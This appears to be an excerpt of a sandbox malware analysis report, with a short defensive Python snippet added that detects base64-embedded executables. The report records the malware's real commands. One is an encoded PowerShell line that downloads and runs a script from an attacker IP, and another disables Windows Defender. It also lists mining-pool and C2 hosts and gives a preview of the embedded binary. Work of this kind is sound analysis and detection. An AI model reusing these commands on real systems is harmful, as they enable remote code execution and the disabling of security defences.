      powershell.exe (PID: 2216 cmdline: powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAMgA4AC4ANAAzAC4ANgAyAC8AZQBvAHAALgBwAHMAMQAnACkAKQAKAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        reg.exe (PID: 2212 cmdline: 'C:\Windows\system32\reg.exe' add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f MD5: D69A9ABBB0D795F21995C2F48C1EB560)
cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Temp\06trmcfr.0.cs
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 5736
Entropy (8bit): 4.918671436686815
Encrypted: false
MD5: B429ACD06F2B7ECFBA004B883016110A
SHA1: 27C513D4FED6AC4850DAB34CA960D326C00685E1
SHA-256: 0F10EA6C49F7FC90B718CC58763D770ED936ABF5DA4E0E49CFC040FF094D3F8D
SHA-512: 5FAB4436371F25DFA8880393CDCEC61B60A86294C64B689D4056D8B0E501B94C6049979D7A67FEE46A9241746BBC60437E5CB522088072AB92D01DF34B94BE37
Malicious: false

C:\Users\user\AppData\Local\Temp\06trmcfr.cmdline
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Size (bytes): 327
Entropy (8bit): 5.282860721087337
Encrypted: false
MD5: 99F5EC56911797D838189952D9845B88
SHA1: B9ACE541052AF074E4579A427D60703720AF4977
SHA-256: 8BE857D417E7CFC49A35BE10645B3F5F9E56BFD28823FCB0051B791E73240EB5
SHA-512: 63696A92E8F6EE2294F50659CECF26BC4706FBF90E0A4B4D73BC9C4214C64CC8110D3C4C01D4B11859C7E5F6C0100E24E13CC6A203A9099628643DEEA70EBC31
Malicious: false

C:\Users\user\AppData\Local\Temp\06trmcfr.out Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: ASCII text, with CRLF line terminators Size (bytes): 352 Entropy (8bit): 5.108980129063329 Encrypted: false MD5: 329D4CF1BD50F6427D1F9E05E5DEBED5 SHA1: 749F8A60371DFFABA04FD658DD1762FE163903DA SHA-256: 855725E6683359B3B40ACE1A5C3014652B80A6D4950EB5A9D5DE084313BE00D5 SHA-512: B9E458F41C7D746788FA14F5213BA11B6BC3063D99AC75DCCBC615DF07BFBD295A1BE7ED1646C25299DDD3C2F FFE59C29BEE1FA9BB2F15E4380EEDAD795C7197 Malicious: false

C:\Users\user\AppData\Local\Temp\cohernece.exe

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32 executable (GUI) Intel 80386, for MS Windows Size (bytes): 1827440 Entropy (8bit): 7.823071696531818 Encrypted: false MD5: 4FE2DE6FBB278E56C23E90432F21F6C8 SHA1: 3D7C17595E687FFD7DD9506DC5EB59860D44B115 SHA-256: F90BCF5B649EBB61D1B2A1A973C04312E3E72A71D4393CCBB12B9FA593637D62 SHA-512: 908AA98AC0FAC00D361627893D01C8551C9B0E4A4242874919B29D7744A09AF91FC92C26F20BC2A7C25C50B8315 26633D30D855853597D693079BF73077D7292 Malicious: true Antivirus: Antivirus: Avira, Detection: 100%, Browse Antivirus: virustotal, Detection: 74%, Browse

C:\Users\user\AppData\Local\Temp\i1bjouxb.0.cs Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5736 Entropy (8bit): 4.918671436686815 Encrypted: false MD5: B429ACD06F2B7ECFBA004B883016110A SHA1: 27C513D4FED6AC4850DAB34CA960D326C00685E1 SHA-256: 0F10EA6C49F7FC90B718CC58763D770ED936ABF5DA4E0E49CFC040FF094D3F8D SHA-512: 5FAB4436371F25DFA8880393CDCEC61B60A86294C64B689D4056D8B0E501B94C6049979D7A67FEE46A9241746BB C60437E5CB522088072AB92D01DF34B94BE37 Malicious: false

C:\Users\user\AppData\Local\Temp\i1bjouxb.cmdline Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Entropy (8bit): 5.321764775012278 Encrypted: false MD5: F8B845F350B7B33792706BC6D14D7D46 SHA1: BFC0111C304A823683D1FA1E9FC7B3153FFD903B

Copyright Joe Security LLC 2018 Page 17 of 50 C:\Users\user\AppData\Local\Temp\i1bjouxb.cmdline SHA-256: 0165702BED18CA0DEB8415A13495B28FD81B5F27F558512CAC182EB70EC32308 SHA-512: 606EE30B6FFD19728E99C7777120AEB755DF0B495B3F1369BD43A8BE7FC9482828CC8352A51CB48BD828ACEDEF 2CD6857CF56AF3C0182ECBBA0BD7B8CB84184D Malicious: false

C:\Users\user\AppData\Local\Temp\i1bjouxb.out Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Size (bytes): 422 Entropy (8bit): 5.4335381582015545 Encrypted: false MD5: A7F51B6AD9989E2417946B2F6D79F817 SHA1: 200355CEB526740C833FE3F1003A26D2F8B053D4 SHA-256: C15631614BEAA238642C3419CC053291B45093A1BCB52B8194FCECD045D61ACB SHA-512: 0EBF551CB622AF6735A3A703897F93C508995DEC1CE8C2F8AF35B142E72FB97A1E13AF3A080494BB8993A97F09D BE3F3FFAD94F6051B8B8649B6EF4FD693B6EA Malicious: false

C:\Users\user\AppData\Local\Temp\java-log-9527.log

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: PE32 executable (GUI) Intel 80386, for MS Windows Size (bytes): 22528 Entropy (8bit): 6.196024156080477 Encrypted: false MD5: 71404815F6A0171A29DE46846E78A079 SHA1: 9BDDFC549FED13AF5F3F40A1CF91CDD26134884F SHA-256: A467974C13CBEE341C08FD0A51C28BF7CC7E482FF078A9D0ED96371B2CED5D95 SHA-512: F1B25991A8BB2AB1D86DD2CE00364F535897EB9508A2CD3D6EFD1BD17F0502BCA0F3DA72110F2C80B815912AD1 0FBB7F82D3091EA754253DA111078B943C7C00 Malicious: true Yara Hits: Rule: ZxShell_Related_Malware_CN_Group_Jul17_2, Description: Detects a ZxShell related sample from a CN threat group, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth Rule: CN_disclosed_20180208_Mal1, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\java-log-9527.log, Author: Florian Roth

Antivirus: Antivirus: Avira, Detection: 100%, Browse Antivirus: virustotal, Detection: 82%, Browse Antivirus: metadefender, Detection: 66%, Browse

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\43PJU0Q7P684BJ9TEKCZ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.566225737430372 Encrypted: false MD5: 72DFB324B263B999DD200B1665FDC533 SHA1: 270A65271ADBEC16E64F6FB8D0D59C0567236B0B SHA-256: C20441DB77CF0CEE0A6130165BBE94B190BD10416D1576F1D483C7D19FF14E88 SHA-512: 72FA96CB9DBA0508D287879D6608F98A6AC89C2356675A1066563936B100550C11ED7398EBC6505504E3EB0FC267 5DF20CFF97EDED02C01BE8BCBB1D3F05E878 Malicious: false

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y2JIYX88BPRCWM2IERRJ.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.566225737430372 Encrypted: false MD5: 72DFB324B263B999DD200B1665FDC533 SHA1: 270A65271ADBEC16E64F6FB8D0D59C0567236B0B SHA-256: C20441DB77CF0CEE0A6130165BBE94B190BD10416D1576F1D483C7D19FF14E88 SHA-512: 72FA96CB9DBA0508D287879D6608F98A6AC89C2356675A1066563936B100550C11ED7398EBC6505504E3EB0FC267 5DF20CFF97EDED02C01BE8BCBB1D3F05E878 Malicious: false

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php Process: C:\Windows\System32\regsvr32.exe

Copyright Joe Security LLC 2018 Page 18 of 50 C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php File Type: XML document, ASCII text, with CRLF line terminators Size (bytes): 635 Entropy (8bit): 5.34168641203373 Encrypted: false MD5: A182AE48D664AAE7D246DFE877BAE7B4 SHA1: F05A17521DAC72882A9ECC615E24ADE48230907E SHA-256: 725D4647C0F74485EE2640F03EAC599E35F046C2E6EBA57DADB33B8E4C39F143 SHA-512: 180AE9BF7DAF56C7743E4D42DF66A6537623F0343D12CFA041D9808E44E2B30634D06B1AD74388C732619206660B 7AB6F44CEE0371AAA006DFED69E3E7CB29F9 Malicious: false Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[1].php, Author: Florian Roth

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[2].php Process: C:\Windows\System32\regsvr32.exe File Type: XML document, ASCII text, with CRLF line terminators Size (bytes): 635 Entropy (8bit): 5.34168641203373 Encrypted: false MD5: A182AE48D664AAE7D246DFE877BAE7B4 SHA1: F05A17521DAC72882A9ECC615E24ADE48230907E SHA-256: 725D4647C0F74485EE2640F03EAC599E35F046C2E6EBA57DADB33B8E4C39F143 SHA-512: 180AE9BF7DAF56C7743E4D42DF66A6537623F0343D12CFA041D9808E44E2B30634D06B1AD74388C732619206660B 7AB6F44CEE0371AAA006DFED69E3E7CB29F9 Malicious: false Yara Hits: Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\antivirus[2].php, Author: Florian Roth

stdout Process: C:\Windows\System32\NETSTAT.EXE File Type: ASCII text, with CRLF line terminators Size (bytes): 855 Entropy (8bit): 3.5554528682381954 Encrypted: false MD5: A112A67374EAFF9D037F9ABFB5676454 SHA1: AF91E74410BB99E89B68BD845E3FFDE891404C68 SHA-256: 27B2773DACA4DE74F63D3D59A813FCF50B5A5EB8449AEA1EE83484C732DBC0C6 SHA-512: 4A2F3120AA99A53FCCC5DC3CEF523C52EC26D8D7E514EDE74ECAA88085713C50279B2D0B7CBC7A9D31FA00094 404CBEAC1BDF4924565BB2EFD0809388F2ACF44 Malicious: false

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
f4keu.7h4uk.com | 185.128.43.58 | true | true | 7%, virustotal | unknown
update.7h4uk.com | 185.128.43.62 | true | false | | high
xmr-eu1.nanopool.org | 51.15.58.224 | true | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://update.7h4uk.com:443/logos.png | true | Avira URL Cloud: safe | unknown
http://185.128.43.62/eop.ps1 | true | 12%, virustotal; Avira URL Cloud: malware | unknown
https://update.7h4uk.com:443/antivirus.php | true | Avira URL Cloud: safe | unknown
https://update.7h4uk.com:443/ver.txt | true | Avira URL Cloud: safe | unknown
https://update.7h4uk.com:443/cohernece.txt | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://update.7h4uk.( | schtasks.exe, 0000000B.00000002.1652004549.0021A000.00000004.sdmp | false | Avira URL Cloud: safe | low
https://certs.starfieldtech.com/repository/0 | cohernece.exe.1.dr | false | | high
http://certificates.godaddy.com/repository/0 | cohernece.exe.1.dr | false | | high
http://certs.starfieldtech.com/repository/1402 | cohernece.exe.1.dr | false | | high
http://crl.starfieldtech.com/sfroot-g2.crl0L | cohernece.exe.1.dr | false | | high
http://certs.godaddy.com/repository/1301 | cohernece.exe.1.dr | false | | high
http://185.128.43.62 | powershell.exe, 00000019.00000002.1978838057.00E60000.00000004.sdmp, powershell.exe, 0000001C.00000002.1973570283.00DC0000.00000004.sdmp | true | 9%, virustotal; Avira URL Cloud: safe | unknown
http://crl.starf | cohernece.exe, 00000020.00000002.1898207923.0012D000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.starfieldtech.com/0; | cohernece.exe.1.dr | false | | high
http://crl.godaddy.com/gdig2s5-2.crl0 | cohernece.exe.1.dr | false | | high
http://185.128.43.62/eop.ps1t | powershell.exe, 00000019.00000002.1978838057.00E60000.00000004.sdmp, powershell.exe, 0000001C.00000002.1973570283.00DC0000.00000004.sdmp | true | Avira URL Cloud: safe | unknown
https://certs.godaddy.com/repository/0 | cohernece.exe.1.dr | false | | high
http://update.7h4uk.com:443/cohernece.txt | powershell.exe, 00000001.00000003.1721698658.026B6000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.godaddy.com/gdroot-g2.crl0F | cohernece.exe.1.dr | false | | high
http://ocsp.starfieldtech.com/0H | cohernece.exe.1.dr | false | | high
http://$nic/antitrojan.ps1t | powershell.exe, 00000019.00000002.1979485760.0106B000.00000004.sdmp, powershell.exe, 0000001C.00000002.1979251410.00FCB000.00000004.sdmp | true | Avira URL Cloud: safe | low
http://crl.starfieldtech.com/repository/0 | cohernece.exe.1.dr | false | | high
http://crl.starfieldtech.com/repository/masterstarfield2issuing.crl0P | cohernece.exe.1.dr | false | | high
http://$nic/antivirus.ps1t | powershell.exe, 00000019.00000002.1979485760.0106B000.00000004.sdmp, powershell.exe, 0000001C.00000002.1979251410.00FCB000.00000004.sdmp | false | Avira URL Cloud: safe | low
http://crl.godaddy.com/gdroot.crl0F | cohernece.exe.1.dr | false | | high
http://nic/antivirus.ps1Tn | powershell.exe, 00000019.00000002.2070818367.012A9000.00000004.sdmp | false | Avira URL Cloud: safe | low
http://$nic/antitrojan.ps1 | powershell.exe, 0000001C.00000002.1993866139.011AA000.00000004.sdmp | true | Avira URL Cloud: safe | low
http://crl.starfieldtech.com/repository/sf_issuing_ca-g2.crt0T | cohernece.exe.1.dr | false | | high
http://$nic/antivirus.ps1 | powershell.exe, 0000001C.00000002.1993866139.011AA000.00000004.sdmp | false | Avira URL Cloud: safe | low
http://update.7h4uk.com:443/antivirus.php | schtasks.exe, 0000000C.00000002.1653473899.003E0000.00000004.sdmp, schtasks.exe, 0000000C.00000002.1653311364.001A0000.00000004.sdmp | true | 10%, virustotal; Avira URL Cloud: malware | unknown
http://certificates.godaddy.com/repository/gdig2.crt0 | cohernece.exe.1.dr | false | | high
http://nic/antivirus.ps1T | powershell.exe, 0000001C.00000002.1993866139.011AA000.00000004.sdmp | false | Avira URL Cloud: safe | low
http://nic/antitrojan.ps1T | powershell.exe, 00000019.00000002.2070818367.012A9000.00000004.sdmp, powershell.exe, 0000001C.00000002.1993866139.011AA000.00000004.sdmp | true | Avira URL Cloud: safe | low
http://update.7h4uk. | schtasks.exe, 0000000C.00000002.1652658525.0007A000.00000004.sdmp | true | Avira URL Cloud: safe | low

Contacted IPs


Public

IP | Country | ASN | ASN Name | Malicious
185.128.43.62 | Switzerland | 60392 | ASRACKENDCH | false

Private

IP
192.168.2.1 192.168.2.3 192.168.2.4 192.168.2.5 192.168.2.6 192.168.2.7 192.168.2.8 192.168.2.9
192.168.2.10 192.168.2.11 192.168.2.12 192.168.2.13 192.168.2.14 192.168.2.15 192.168.2.16 192.168.2.17
192.168.2.18 192.168.2.19 192.168.2.20 192.168.2.21 192.168.2.22 192.168.2.23 192.168.2.24 192.168.2.25
192.168.2.26 192.168.2.27 192.168.2.28 192.168.2.29 192.168.2.30 192.168.2.31 192.168.2.32 192.168.2.33
192.168.2.34 192.168.2.35 192.168.2.36 192.168.2.37 192.168.2.38 192.168.2.39 192.168.2.40 192.168.2.41
192.168.2.42 192.168.2.43 192.168.2.44 192.168.2.45 192.168.2.46 192.168.2.47 192.168.2.48 192.168.2.86
192.168.2.90 192.168.2.91 192.168.2.92 192.168.2.93 192.168.2.94 192.168.2.95 192.168.2.96 192.168.2.97
192.168.2.98 192.168.2.99 192.168.2.104 192.168.2.120 192.168.2.121 192.168.2.122 192.168.2.123 192.168.2.124
192.168.2.125 192.168.2.126 192.168.2.127 192.168.2.128 192.168.2.129 192.168.2.130 192.168.2.131 192.168.2.132
192.168.2.133 192.168.2.134 192.168.2.135 192.168.2.136 192.168.2.137 192.168.2.138 192.168.2.139 192.168.2.140
192.168.2.141 192.168.2.142 192.168.2.143 192.168.2.144 192.168.2.145 192.168.2.146 192.168.2.147 192.168.2.148
192.168.2.149 192.168.2.150 192.168.2.151 192.168.2.152 192.168.2.153 192.168.2.154 192.168.2.155 192.168.2.156
192.168.2.157 192.168.2.158 192.168.2.159

Static File Info

General

File type: ASCII text, with very long lines, with no line terminators
Entropy (8bit): 5.6445849091681675
TrID:
File name: antitrojan.ps1
File size: 2056945
MD5: 33347699f9845a17ae84f1e75fe4f636
SHA1: 390d236b3ba304a432ee4f9647cc7013c6efcf09
SHA256: b4e55517ba1268e9a5efaaaecb71ad683932caa75819fdf5f82f3bb37061e145
SHA512: 067ccbac6f932d9480ddc0b3e6e26c0befd1b41f8e6c6a8a0d12d99951ec9ecd0ec8795f2bfbe496e923a82755f8bdfe2c390376c2265437c60c182834b54b7f
File Content Preview: $miiiiii="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACLwQPuz6Btvc+gbb3PoG29ezycvcWgbb17PJ69WqBtvXs8n73WoG299P5uvNigbb30/mi82aBtv
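The file content preview shows why a 2 MB "text" script has the entropy of a packed binary: the variable $miiiiii holds a base64 string beginning TVqQ, which is the "MZ" DOS header, so the PowerShell file is a dropper carrying an embedded PE image. The following Python is an added example written for this report, not code from the sample or from Joe Sandbox. It scans a script body for long base64 runs, decodes each one and reads the DOS header the way a triage tool would: MZ magic, the e_lfanew pointer at offset 0x3c, the DOS stub text, and the PE signature when enough of the image is present. The input is the preview transcribed from this page (PDF line breaks removed); the 64-character floor and the field names are this example's own choices.

```python
import base64
import re
import struct
from typing import Dict, List, Optional

# Constructed input, transcribed from this report's File Content Preview: the
# opening of antitrojan.ps1 with the PDF line breaks removed. Only the first 245
# base64 characters are visible, so the decoded image is truncated. The run of
# 47 'A' characters (the zeroed DOS header fields before e_lfanew) is written as
# a repeat to avoid a miscount.
PREVIEW = (
    '$miiiiii="'
    + "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQ"
    + "A" * 47
    + "IAEAAA4fug4AtAnNIbgBTM0hVGhpcyB"
    + "wcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v"
    + "ZGUuDQ0KJAAAAAAAAACLwQPuz6Btvc+gbb3PoG29"
    + "ezycvcWgbb17PJ69WqBtvXs8n73WoG299P5uvNigbb3"
    + "0/mi82aBtv"
    + '"'
)

# An unbroken base64 run; 64 characters is an arbitrary floor (this example's
# choice) that skips GUIDs, hashes and short tokens.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def find_base64_blobs(text: str, min_len: int = 64) -> List[str]:
    """Return every base64 run of at least min_len characters."""
    return [m.group(0) for m in BASE64_RUN.finditer(text) if len(m.group(0)) >= min_len]


def sniff_pe(blob: str) -> Optional[Dict[str, object]]:
    """Decode a base64 run and report whether it starts a PE image.

    A truncated run (a preview or a partial memory dump) is trimmed to a whole
    number of quartets so the decodable prefix is still examined. Returns None
    when the run is not valid base64 at all.
    """
    usable = blob[: len(blob) - len(blob) % 4]
    try:
        data = base64.b64decode(usable, validate=True)
    except ValueError:
        return None
    info: Dict[str, object] = {
        "decoded_len": len(data),
        "mz": data[:2] == b"MZ",
        "dos_stub": b"This program cannot be run in DOS mode" in data,
        "e_lfanew": None,       # offset of the PE header, read from 0x3c
        "pe_signature": None,   # None: the offset lies beyond the decoded bytes
    }
    if info["mz"] and len(data) >= 0x40:
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        info["e_lfanew"] = e_lfanew
        if e_lfanew + 4 <= len(data):
            info["pe_signature"] = data[e_lfanew:e_lfanew + 4] == b"PE\0\0"
    return info


def scan_script(text: str) -> List[Dict[str, object]]:
    """Run sniff_pe over every candidate blob in a script body."""
    hits = []
    for blob in find_base64_blobs(text):
        info = sniff_pe(blob)
        if info is not None:
            hits.append({"prefix": blob[:16], "length": len(blob), **info})
    return hits


if __name__ == "__main__":
    for hit in scan_script(PREVIEW):
        print(hit)
```

On the preview the decoder sees the MZ magic, an e_lfanew of 0x120 and the DOS stub string, but only 183 bytes are recoverable, so the PE signature check is reported as undetermined rather than false. On the full 2 MB script the same function would reach the signature; the dropped file cohernece.exe (PE32, 1827440 bytes) is the natural candidate for what the blob contains, but this example does not assume that mapping.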

File Icon

Network Behavior

Network Port Distribution

Total Packets: 50 • 443 (HTTPS) • 53 (DNS)

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 4, 2018 05:06:04.007205009 CEST | 56842 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.035728931 CEST | 53 | 56842 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.068552971 CEST | 53440 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.110846043 CEST | 53 | 53440 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.134479046 CEST | 59605 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.181596041 CEST | 53 | 59605 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:04.203902006 CEST | 50900 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:04.216890097 CEST | 53 | 50900 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.210169077 CEST | 51075 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.247931004 CEST | 53 | 51075 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.280410051 CEST | 61674 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.293931961 CEST | 53 | 61674 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.322196960 CEST | 59291 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.349576950 CEST | 53 | 59291 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.375962973 CEST | 63053 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.403438091 CEST | 53 | 63053 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.936928034 CEST | 60812 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:36.950007915 CEST | 53 | 60812 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:36.973893881 CEST | 49161 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:36.987097025 CEST | 443 | 49161 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:36.987159967 CEST | 49161 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:36.987550020 CEST | 49161 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:37.000843048 CEST | 443 | 49161 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:37.001055956 CEST | 443 | 49161 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:37.001085997 CEST | 443 | 49161 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:37.001183033 CEST | 49161 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:37.002031088 CEST | 49161 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:37.015224934 CEST | 443 | 49161 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.052798033 CEST | 58523 | 53 | 192.168.2.2 | 8.8.8.8
Sep 4, 2018 05:06:45.065839052 CEST | 53 | 58523 | 8.8.8.8 | 192.168.2.2
Sep 4, 2018 05:06:45.079092026 CEST | 49162 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.092384100 CEST | 443 | 49162 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.092472076 CEST | 49162 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.093209028 CEST | 49162 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.106537104 CEST | 443 | 49162 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.106734991 CEST | 443 | 49162 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.106764078 CEST | 443 | 49162 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.106859922 CEST | 49162 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.107306957 CEST | 49162 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.124243975 CEST | 443 | 49162 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.297699928 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.311093092 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.311182022 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.311439037 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.324865103 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325161934 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325201988 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325227976 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325247049 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.325432062 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325458050 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325473070 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.325480938 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325504065 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325526953 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325552940 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325567007 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.325576067 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.325752974 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.338663101 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.338766098 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.338808060 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.338838100 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.338916063 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.338941097 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339003086 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.339080095 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339104891 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339128017 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339150906 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339174032 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339189053 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
Sep 4, 2018 05:06:45.339196920 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339220047 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339242935 CEST | 443 | 49163 | 185.128.43.62 | 192.168.2.2
Sep 4, 2018 05:06:45.339292049 CEST | 49163 | 443 | 192.168.2.2 | 185.128.43.62
